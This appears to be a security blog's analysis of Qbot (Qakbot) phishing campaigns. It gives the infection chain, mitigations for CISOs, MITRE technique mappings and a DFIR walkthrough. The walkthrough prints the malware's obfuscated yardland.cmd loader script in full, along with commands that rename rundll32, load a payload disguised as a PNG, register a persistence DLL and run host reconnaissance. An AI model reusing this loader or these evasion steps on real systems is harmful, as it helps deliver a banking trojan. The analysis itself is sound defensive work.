Qbot Malware Phishing Trends: Detection vs Infection


QBot, also known as Qakbot, QBot, QuackBot, and Pinkslipbot, is a Banking Trojan that was first observed in 2007. Today, Qbot is still a dangerous and persistent threat to organizations and has become one of the leading Banking Trojans globally. In the past month, we have observed an increase in attacks and they seem to be attacking organizations to collect valuable information which can be replayed against partner organizations. This makes the attack seem real by knowing key information and often including a false email trail.

To this day, QBot continues to grow and develop, with more capabilities and new techniques. Its main purpose is to steal banking data (banking credentials, online banking session information, victim’s personal details, etc.). However, its developers have also developed functionalities that allow QBot to spread itself, evade detection and debugging, and install additional malware on compromised machines, such as Cobalt Strike, REvil, ProLock, and Egregor ransomware.

The process to obtain persistence has many layers of obfuscation where known DLL files and/or Trusted system executables are being used to inject processes in an attempt to hide from EDR / Antivirus solutions.

Qbot uses multiple attack vectors to infect victims. QBot is distributed through phishing emails containing malicious documents, attachments, or password-protected archives with the documents attached. Some versions of the malware were observed being distributed by a dropper, such as Emotet.

For the CISO

Today Phishing emails present risks to most modern enterprises and they continue to get more creative and advanced. Currently, we are seeing a rise in sophisticated phishing campaigns often targeted at each enterprise. Currently, QBot malware is using a DLL injection or DLL hijacking attack methods to exploit how Dynamic Link Libraries (DLLs) are loaded in Windows.

Adversaries may abuse rundll32.exe to proxy the execution of malicious code. Using rundll32.exe versus executing directly may help avoid detection and may also hide in a sea of log data often overlooked by enterprise security teams.

Chain of Attack

  • phishing email >> link OR HTML >> download zip >> unzip >> mount iso image >> autorun lnk >> rundll32 process injection >> persistence

Security Controls for CISO

Phishing Email

Based on the current attacks observed to date they have a common theme, where emails are from spoofed domains or email addresses. Often the bodies contain company references and historical email threads. As CISO we should ensure minimum baselines when considering email risks and external user authentication.

  • Modern Next-Generation Proof Point Email Protection
  • DKIM, DMARC, and SPF records
  • SPF Hard Failure is used to drop inbound proofed emails.
  • Backscatter on O365
  • Email Authentication MFA
  • User Education and Phishing Training

Initial Infection

Each phishing attack does require human intervention, so the human factor is the common weak link. Here is a short list of items identified and potential mitigation strategies.

  • Block non-standard attachments
    • Consider limiting Corporate email to Word Documents, Spreadsheets, Powerpoint, PDF and ideally shift toward filesharing services.
  • User Training
    • Staff should never interact with password-protected files, without verbal or physical confirmation that the sender is known.
  • GPO Policy
    • Remove Autorun for external drives and images, since this attachment leverages this windows feature.


The last stage of the attack is where persistence plus command and control is established. Visibility and mitigation are limited at this point and we can say the horses have already left the barn. Regardless it is very important to be utilizing best in breed tools to ensure maximum effectiveness.

  • Utilize Next Generation EDR product Crowdstrike or Microsoft Defender
  • DNS Filtering
  • Next-Generation Firewall Fortinet / Palo Alto
  • Security Operation and Threat Hunting Team

However, the recon tools and tactics after execution are very common and should be monitored.

  • whoami
  • net use
  • arp -a
  • registry key startup creation

If left unchecked for long enough ransomware gangs, including Black BastaEgregor, and Prolock use the malware to gain initial access to corporate networks and then proceed to exfil data and encrypt data. I will continue to investigate the current Qbot attacks and convert this into a blue team threat hunt.

Reference Articles

DFIR Summary


  • Masquerading – Mitre T1036 – renamed rundll32 executable was launched
  • Software Packing – Mitre T1027.002 – packed executable was written to disk
  • Process Injection – Mitre T1055 – rundll32 used to inject process
  • Persistence – Mitre TA0003 – registry start key was added
  • Process Injection – Mitre T0155
  • Discovery Process – Mitre 1057

Indicators of Compromise



Command and Control

Recon Commands

arp -a
net use
ipconfig /all

Detailed DFIR Investigation

Initial Payload

After Clicking on the HTML Payload a fake Adobe Screen is presented, which triggers a zipped payload to be downloaded automatically. The file is password-protected Zip with ISO image set to autorun once mounted.

After unzipping the payload we double click on the ISO image which results in the following command being executed

C:\Windows\system32\cmd.exe /c E:\yardland.cmd 

Yardland.cmd Script

SETLOCAL EnableDelayedExpansion
start unfeignedness_sitiophobia.png
set x3=run
set x2=dll
set x1=32
if %random% neq 100 (
    set tmp1=!x1!
    set x1=!x3!
    set x3=!tmp1!
) else (
    set tmp1=!x2!
    set x1=!x1!
    set x2=!tmp1!
set exe2=templ
set exe1=ates201.png
if %random% neq 200 (
    set tmp2=!exe1!
    set exe1=!exe2!
    set exe2=!tmp2!
) else (
    set tmp2=!x1!
    set exe1=!tmp2!
    set exe2=!x2!
if %random% neq 300 (
    set xxx=#1
) else (
    set xxx=unfeignedness_sitiophobia.png
echo f|xcopy %SystemRoot%\system32\%x1%%x2%%x3%.exe %temp%\companionably.exe /h /s /e
set t3=%temp%\%random%.%random%
echo f|xcopy !exe1!!exe2! %t3% /h /s /e
%temp%\companionably.exe %t3%,%xxx%

Initial Infection

The following Process tree illustrates the Parent-Child process relationship and each command which spawned from yardland.cmd execution.

Masquerading – Mitre T1036

A renamed rundll32 executable was launched. Adversaries can rename files to evade detection. Review the command line and process tree.

xcopy C:\Windows\system32\rundll32.exe C:\Users\admin\AppData\Local\Temp\companionably.exe /h /s /e

Software Packing – Mitre T1027.002

A packed executable has been written to disk. If this is unexpected, it might indicate suspicious activity. Review the process tree and related file written events.

xcopy templates201.png C:\Users\admin\AppData\Local\Temp\2694.7172 /h /s /e

Process Injection – Mitre T1055

Using rundll32 to inject process A likely malicious process injected into another process in a suspicious way.

C:\Users\admin\AppData\Local\Temp\companionably.exe C:\Users\admin\AppData\Local\Temp\2694.7172,#1

Persistence (Registry Key Added) – Mitre TA0003

A process made a suspicious change to the registry that may be indicative of a malicious persistence mechanism.

“C:\Windows\SysWOW64\CertEnrollCtrl.exe” was used write DLL “AppData\Roaming\Microsoft\Pnkelie\muuopzfn.dll”

regsvr32.exe "C:\Users\admin\AppData\Roaming\Microsoft\Pnkelie\muuopzfn.dll"

Investigation of “Muuopzfn.dll”

  • Process Injection – Mitre T0155
  • Discovery Process – Mitre 1057
Behavioural detection: Injection (Process Hollowing)HighInjection:rundll32.exe(2792) -> wermgr.exe(1516)
Executed a process and injected code into it, probably while unpackingHighInjection:rundll32.exe(2792) -> wermgr.exe(1516)
Access the NetLogon registry key, potentially used for discovery or tamperingMediumregkey:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters
Enumerates running processMediumprocess:System with pid 4
process:smss.exe with pid 268
process:csrss.exe with pid 356
process:wininit.exe with pid 392
process:csrss.exe with pid 400
process:winlogon.exe with pid 428
process:services.exe with pid 488
process:lsass.exe with pid 496
process:lsm.exe with pid 504
process:svchost.exe with pid 604 ….